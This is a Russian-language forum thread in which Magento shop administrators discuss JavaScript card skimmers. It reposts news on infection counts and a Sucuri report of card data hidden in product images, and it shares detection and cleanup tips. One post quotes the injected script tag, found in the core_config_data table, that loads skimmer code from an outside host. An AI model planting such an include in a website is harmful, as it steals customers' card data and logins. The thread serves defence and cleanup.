Онлайн JS-скиммеры на Magento Commerce

byura

Хранитель порядка
Регистрация
29 Янв 2007
Сообщения
706
Реакции
849
Проверяем свои магазины
список на Для просмотра ссылки Войди или Зарегистрируйся
в зоне ru около 100 магазинов
новость с geektimes
Для внедрения закладок используются уязвимости в программном обеспечении интернет-магазинов. В первую очередь, это уязвимое программное обеспечение Magento Commerce. Именно через него проще всего внедрить код CMS, хотя на самом деле этот код может работать в любом интернет-магазине, не обязательно использующем Magento.
Проверить интернет-магазин на наличие уязвимостей можно на сайте _MageReport.com

Хотя проблему подняли год назад, но за прошедший год она никуда не исчезла. Хуже того, заражённых интернет-магазинов стало в полтора раза больше. В марте 2016 года количество магазинов со скиммерами выросло с 3501 до 4476, а в сентябре 2016 года — до 5925
 
Последнее редактирование:
Полгода назад эту заразу у клиентов чистил. Айболит её на ура ловил. Старая дырявая энтерпрайз.
 
может и для кого новости старые
но чет часто стали magento ломать, впрочем и опенкарт в списке
взято с хакерру
Специалисты компании Sucuri обнаружили интересную вредоносную кампанию, направленную против сетевых магазинов, работающих под управлением CMS Magento. Исследователи пишут, что не проходит и недели без обнаружения очередной малвари, ворующей данные банковских карт. К примеру, совсем недавно та же Sucuri сообщала о вредоносе Magecart, который заражает сайты на базе Magento, OpenCart и Powerfront.

Однако новая угроза весьма необычна, а ее авторы крайне изобретательны. Исследователи пишут, что обычно злоумышленники извлекают украденные данные пользователей посредством email, или просто добавляют собранную информацию в какой-либо файл на сервере и время от времени проверяют «улов». В данном случае схема извлечения данных выглядит иначе.

Злоумышленники компрометируют магазины на базе Magento, а затем изменяют один из ключевых файлов CMS: Cc.php. В файл добавляется дополнительный код (см. иллюстрацию ниже), который не просто отвечает за запись всех данных о платежных картах, которые пользователи вводят на странице оформления и оплаты заказа, но также сохраняет эту информацию в файлы изображений, размещенные на сервере.

store-snippet-1040x573.png


Использование фальшивых изображений для передачи данных – это не ново, равно как и сама стеганография. Но при этом, как правило, графический файл не содержит фактического изображения, так что обнаружить подлог несложно. В обнаруженном исследователями случае всё иначе. Данные о банковских картах пользователей сохраняются внутри настоящих картинок, на которых представлен продающийся в зараженном магазине товар. Более того, информация добавляется в файл после легитимного кода, в виде обычного текста, и никак не влияет на само изображение. Так как картинки публично доступны и могут быть просмотрены любым посетителем сайта, злоумышленникам даже не требуется сохранять доступ к скомпрометированному ресурсу.

image-storing-data-650x418.png

На первый взгляд обычное изображение, содержащее данные о банковских картах
«Всё, что потребуется сделать атакующим – скачать изображение с сайта, как любую другую картинку, и просмотреть его исходный код», — пишут исследователи.

По данным Sucuri, атакам данной малвари уже подверглись магазины в США, Японии, Турции, Саудовской Аравии и Канаде. Специалисты в очередной раз напоминают владельцам магазинов и системным администраторам о необходимости своевременно устанавливать патчи. Для обнаружения инфекции можно проверить файлы по параметру last modified («время последнего изменения»:( вредоносные файлы изменяются чаще и хорошо заметны, так как выбиваются из общей картины.
 
на днях парочку магазинов очистил, у всех был один подход
в таблице core_config_data путь design/head/includes
1-2 строки ~ с таким содержимым

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>
 
на днях парочку магазинов очистил, у всех был один подход
в таблице core_config_data путь design/head/includes
1-2 строки ~ с таким содержимым

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>
Данная уязвимость не распространяется для всех магазинов. Частично проблема заключается в модулях чекаута.
Можешь в личку с подробностями?
 
Данная уязвимость не распространяется для всех магазинов. Частично проблема заключается в модулях чекаута.
Можешь в личку с подробностями?
Этот скрипт прописывается как правило в самой бд. Он отправляет на внешний сервис - все что вводят клиенты на сайте (слова для поиска, логины, пароль, в том числе и данные о самом клиенте и данные карточки). если у вас не используется платежные модули, которые на вашем сайте требуют ввода пластиковых карточек - он все равно отправит все заполненные формы пользователя. что бы проверить сайт на скрипт, можно воспользоватся сервисом Для просмотра ссылки Войди или Зарегистрируйся - нас интересует раздел "GuruInc Javascript Hack?". Магазины, которые содержат подобный скрипт - браузеры помечают как "вредоносный" т.е. при открытии странички - вся страничка будет красная.
После того как вы удалили скрипт, нужно зайти в "Для просмотра ссылки Войди или Зарегистрируйся" в раздел Проблемы безопасности - описать способы решения проблемы и отправить запрос на повторное сканирования (в течении 72-х часов будет произведена проверка и ваш сайт станет опять отображаться в нормальном виде)

Т.Е. не важно какой чекаут, даже если его не будет - проблема будет, если будет скрипт на вашем сайте
 
Последнее редактирование модератором:
Назад
Сверху